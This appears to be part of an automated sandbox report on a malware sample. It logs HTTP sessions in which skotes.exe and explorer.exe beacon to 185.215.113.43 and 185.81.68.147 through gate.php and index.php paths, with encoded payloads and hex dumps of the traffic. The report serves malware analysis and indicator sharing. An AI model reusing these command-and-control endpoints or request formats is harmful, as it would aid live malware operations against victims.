                                                                                                                                                                                                                                                                                        Data Raw: 38 64 61 34 0d 0a 4e 3f 3c 6f 33 10 19 16 17 43 44 10 5b 6a 5b 55 57 57 5b 59 5d 17 46 12 58 17 6d 45 14 4c 5b 05 46 47 1e 1f 49 13 48 42 17 18 45 1b 54 53 13 18 54 0e 5c 48 15 19 19 1b 1c 57 5c 5c 51 0a 46 43 48 19 51 0a 59 01 58 03 1b 54 5b 5c 49 13 48 42 17 18 42 07 55 55 54 53 43 13 48 4c 5a 5a 43 50 5a 58 51 1b 5b 16 55 1a 40 1b 16 47 1c 15 55 00 50 55 46 5e 14 42 0d 0c 52 1c 51 0d 56 57 55 53 19 02 5e 0f 1d 17 15 19 14 1e 43 50 46 12 5b 53 07 44 18 08 59 1c 5d 0a 59 56 1a 52 0c 5c 4e 40 19 12 14 0b 57 53 56 5b 5e 0f 56 4c 43 50 55 5c 5b 51 44 47 4d 4a 5f 5f 18 5e 5a 09 57 48 5b 14 52 15 18 11 41 1b 03 0d 5a 55 5a 07 4f 59 5d 53 58 4f 52 0d 5a 1f 1b 15 16 16 44 47 55 0a 41 5c 03 43 53 4b 51 09 5b 01 59 52 55 41 0a 42 4a 01 5a 5f 14 4e 19 12 13 5a 52 0f 52 10 19 5a 4b 5e 1c 16 1c 15 16 4e 5e 5f 05 1a 43 15 5a 09 55 02 18 58 47 1f 0b 5e 1d 0d 43 57 44 11 5c 1e 5a 59 5a 4b 13 4e 17 17 5b 08 18 5a 55 59 1a 03 5d 5f 05 1d 14 49 16 44 1e 10 1b 54 58 50 11 58 10 1b 1b 5f 45 48 1b 1c 19 14 1d 05 5f 11 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: 8da4N?<o3CD[j[UWW[Y]FXmEL[FGIHBETST\HW\\QFCHQYXT[\IHBBUUTSCHLZZCPZXQ[U@GUPUF^BRQVWUS^CPF[SDY]YVR\N@WSV[^VLCPU\[QDGMJ__^ZWH[RAZUZOY]SXORZDGUA\CSKQ[YRUABJZ_NZRRZK^N^_CZUXG^CWD\ZYZKN[ZUY]_IDTXPX_EH_VVTNJX[OJDN[DDQYkl;B:?4<F[^RUEDF8=C?o?B;=A<hN9nBEFFBF]AD@V]X\HPYYL\UTWHCQWZBQ^TEDk?CDB@IQM^[@4<DBGAV9VXZE_@?<BABn43DBE9lCDBBPVj[\P[BP^AWAEQPEPj@__K[U6RY\TW@YDAn\h<FFCDBBPX]RXQWQVE9UQhZDmFBGD\HMkCRYSP^U@EVUC__U\XZDY[SMlO^DEXWW\TGl@[WSk\RXU?Z,@_K_rRArEA\G@TZZVTZX[GAECEPj@MUABkCVAM\DZi?[j9FBYBQ?8@\W\eTCh[LTjXU^UPB:WkXnSlVEQZZLElhFQCYYFVCmA^i]eTCh[LTjVXAC_kYYKVXZE^B[G[KYZjACCXUCQGQQDASXjDRGZXeP_WP
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:05.962776899 CET224INData Raw: 41 4c 53 6b 43 0f 5e 5b 54 5b 5c 5a 14 56 5a 46 59 6e 12 07 4f 46 3a 52 07 40 03 69 15 14 43 15 1c 10 07 4d 46 0b 3e 1b 53 56 58 51 08 56 4c 56 45 49 17 5f 50 55 5b 40 0d 54 59 01 56 42 0c 59 08 1a 08 40 5a 57 5d 0a 54 0a 16 69 10 08 51 17 10 05
                                                                                                                                                                                                                                                                                        Data Ascii: ALSkC^[T[\ZVZFYnOF:R@iCMF>SVXQVLVEI_PU[@TYVBY@ZW]TiQEG_BTYXJElXPUhPSP:pPTDWNPBXB^_^FIXXXPUXACMA8@AWNeFVEE[eo9l@@ZQ[ihC_Pj@\HIiSEkTWL\PZFX_kT
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:05.962794065 CET1236INData Raw: 3a 16 46 46 5e 4e 54 5e 6d 46 53 05 6e 14 42 58 45 4d 59 51 0e 52 17 44 08 65 1b 6a 16 10 54 41 10 5d 53 0d 45 44 00 55 12 09 3a 17 58 52 57 3f 13 44 0b 51 0f 6a 40 5c 48 49 69 53 00 45 07 6b 17 19 5a 5a 55 43 46 09 38 10 56 0d 45 5b 48 55 09 5a
                                                                                                                                                                                                                                                                                        Data Ascii: :FF^NT^mFSnBXEMYQRDejTA]SEDU:XRW?DQj@\HIiSEkZZUCF8VE[HUZGXXDG[U>K@PBPKSUSA]W>PDQcQ]\\CCe[S[_VDlWDl@DQAh^\UI@_S_^SPZW@YZZJ\ETZS@:CT\UQJE=VW\UiRYPXn\t`3IG
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:05.962812901 CET224INData Raw: 5e 53 09 52 3a 16 58 71 56 40 54 43 55 43 07 4d 42 5f 10 58 44 50 59 59 5d 1e 11 47 54 57 07 0a 1b 5c 54 56 01 5e 0e 5e 5e 58 15 43 12 14 12 4c 47 51 0c 3f 13 10 07 4d 46 6a 40 19 40 58 42 43 04 43 0c 0a 69 1b 62 06 19 09 68 1e 38 10 10 14 56 5a
                                                                                                                                                                                                                                                                                        Data Ascii: ^SR:XqV@TCUCMB_XDPYY]GTW\TV^^^XCLGQ?MFj@@XBCCibh8VZS[hDi_\_iSIo]WCm@XXAZQ^R@l@9FGORmAT>WM__YTB_keUEA[]BRU:SQhCX_iSIo]WCm@VUXEGi]BUXFYZDTVnBKF@V
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:05.962817907 CET1236INData Raw: 0d 44 07 1a 47 5c 58 55 40 59 43 51 59 6e 12 04 58 44 08 18 0f 50 32 50 5b 51 5c 02 45 0d 13 40 57 6a 40 07 0c 55 57 55 04 5d 42 51 5a 4b 04 6a 16 53 43 42 38 10 10 10 41 1b 11 53 1e 40 5b 69 15 57 5e 0d 57 0d 05 1b 53 46 12 17 59 5d 53 59 15 58
                                                                                                                                                                                                                                                                                        Data Ascii: DG\XU@YCQYnXDP2P[Q\E@Wj@UWU]BQZKjSCB8AS@[iW^WSFY]SYX^VXM_[^Z_S^SB:XAQZJCjPRYf__Q\QhFs4aJEU]S_IEMCAiMSLDiDBQCSX[hDn>8@DWLUj=BYTT\hVBnBZWZZA_mAT>ECUjP>
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:05.962824106 CET1236INData Raw: 55 55 08 17 5d 1e 06 5e 43 07 05 54 46 0e 09 50 0d 44 10 01 5b 57 16 45 5b 68 44 54 42 40 59 4e 52 17 4f 56 5d 58 16 5c 5e 4d 16 17 12 46 0f 68 5c 57 49 43 40 1d 56 5b 0a 46 51 0b 59 53 17 6a 44 0a 46 09 5e 5a 41 16 45 44 0b 51 0f 6a 40 4c 43 5c
                                                                                                                                                                                                                                                                                        Data Ascii: UU]^CTFPD[WE[hDTB@YNROV]X\^MFh\WIC@V[FQYSjDF^ZAEDQj@LC\DhU>WX[QiJ@=SWS:FANDT^mFPJB>ZZVB_kJN[kY[DFESiFFD_XO\\FMlVETTIPBU\\Nl@YYS:FTB@^^PQB_eVPQ=BVGPXXQWQl@tYSFW\RZE?DYSUQ_UR
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:05.962830067 CET448INData Raw: 10 46 03 4d 58 1b 0c 17 43 1b 40 1b 38 33 19 16 14 10 15 14 44 12 10 42 15 41 00 54 39 57 09 5b 43 51 5f 17 13 5e 6f 3f 12 16 42 19 10 19 16 17 41 11 39 3a 3f 19 19 16 14 10 15 14 44 12 10 42 17 16 1e 3b 6c 14 46 15 17 14 11 43 11 44 42 15 12 16
                                                                                                                                                                                                                                                                                        Data Ascii: FMXC@83DBAT9W[CQ_^o?BA9:?DB;lFCDBBRVP=UP_VDQF[T_kWGZSQ<TZ@{JCXQR=BVGPX\YQP\>BChD<iDBBABPW\QSA^^R@X\A_AXTUjPSjWL[VUGhFSVE:YDCGPU
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:05.962836027 CET1236INData Raw: 0d 50 11 44 08 65 1b 42 58 1d 45 46 0d 44 51 16 52 16 06 45 4b 44 07 46 44 57 5e 07 54 55 42 46 42 57 4f 50 5e 49 43 43 4c 45 07 4f 41 65 1b 16 40 49 45 51 59 6e 12 16 52 4e 11 6a 44 14 16 59 56 57 54 0b 5e 08 06 50 40 0b 3e 1b 75 41 46 5e 13 50
                                                                                                                                                                                                                                                                                        Data Ascii: PDeBXEFDQREKDFDW^TUBFBWOP^ICCLEOAe@IEQYnRNjDYVWT^P@>uAF^P^ZWRUDPhF]OZX@kQmFBT@_B\GBCSeBFEPhFQ^WHZVYh&IDTFS>XCCRZEU\BQiTV>Y]VC]CW@LBPReubfiDQ\DEXjD@GFXPQEOIQJETU
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:05.962841988 CET224INData Raw: 40 55 57 54 04 19 10 52 52 5c 41 1a 14 5e 50 43 25 56 54 10 52 45 16 53 15 1a 03 41 5f 1d 0a 43 4c 4d 59 15 5e 42 01 6b 55 5e 53 4f 04 42 4c 51 5a 4b 7c 57 57 58 1d 46 01 55 55 1a 17 0b 5b 16 1d 14 08 5a 53 51 1f 17 54 1c 16 76 5d 58 16 5c 5e 4d
                                                                                                                                                                                                                                                                                        Data Ascii: @UWTRR\A^PC%VTRESA_CLMY^BkU^SOBLQZK|WWXFUU[ZSQTv]X\^MA_SPMSLDv[FUCSXVRCVXNq]REBRFUBWBCDdSMRG^'TQ^JKU^SOA\NWYPU@JD!XXS@FZ^TJPJB!V^MSYREUXUQGQWHNXA
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:05.962878942 CET1236INData Raw: 27 50 02 47 52 47 42 06 42 4a 16 47 4a 1f 59 19 4d 10 0d 17 1c 11 1f 1e 0e 19 50 50 14 18 50 58 4a 51 5c 03 44 45 29 5f 15 40 4f 15 4c 14 54 0f 1f 07 0e 54 41 45 2e 50 43 4d 18 51 0e 43 27 56 56 51 11 55 58 51 46 47 2a 53 5d 07 17 0b 5b 16 1d 14
                                                                                                                                                                                                                                                                                        Data Ascii: 'PGRGBBJGJYMPPPXJQ\DE)_@OLTTAE.PCMQC'VVQUXQFG*S][SRP{S[DVzXTtTJ\\Z^EREMFZSQJDWZLZ\XED-XCK\[[FP^QDx[]JLJDOYMUXB[\NwPTGQAUEMFVVRa CtRo[o$|&_LILZSx@W$gcVf<J


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        95192.168.2.1050151185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:05.441742897 CET306OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39
                                                                                                                                                                                                                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:06.653698921 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:50:06 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        96192.168.2.1050156185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:05.892986059 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:06.015974045 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:07.654304981 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:06 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        97192.168.2.1050164185.81.68.14780
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:07.622625113 CET264OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:08.956460953 CET257INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:08 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 40
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 35 32 36 62 39 30 39 36 37 61 31 62 37 35 39 39 36 34 30 35 34 64 32 30 62 37 36 65 36 66 34 66 35 37 34 31 63 31 64 62
                                                                                                                                                                                                                                                                                        Data Ascii: 526b90967a1b759964054d20b76e6f4f5741c1db


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        98192.168.2.1050165185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:07.940753937 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:08.068063021 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:09.550163031 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:08 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        99192.168.2.1050172185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:08.961795092 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:10.244048119 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:50:10 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        100192.168.2.1050174185.81.68.14780
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:09.148330927 CET284OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:09.269536018 CET10OUTData Raw: 72 57 42 2b 57 5a 5c 55 43 12
                                                                                                                                                                                                                                                                                        Data Ascii: rWB+WZ\UC


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        101192.168.2.1050176185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:09.783271074 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:09.904036045 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:11.388235092 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:10 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        102192.168.2.1050182185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:11.622370005 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:11.742161036 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:13.073447943 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:12 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        103192.168.2.1050183185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:12.212207079 CET306OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39
                                                                                                                                                                                                                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:13.539308071 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:50:13 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        104192.168.2.1050184185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:13.344489098 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:13.465562105 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:14.785942078 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:14 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        105192.168.2.1050192185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:15.026617050 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:15.152143002 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:16.722328901 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:15 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        106192.168.2.1050194185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:15.977622986 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:17.279499054 CET219INHTTP/1.1 200 OK
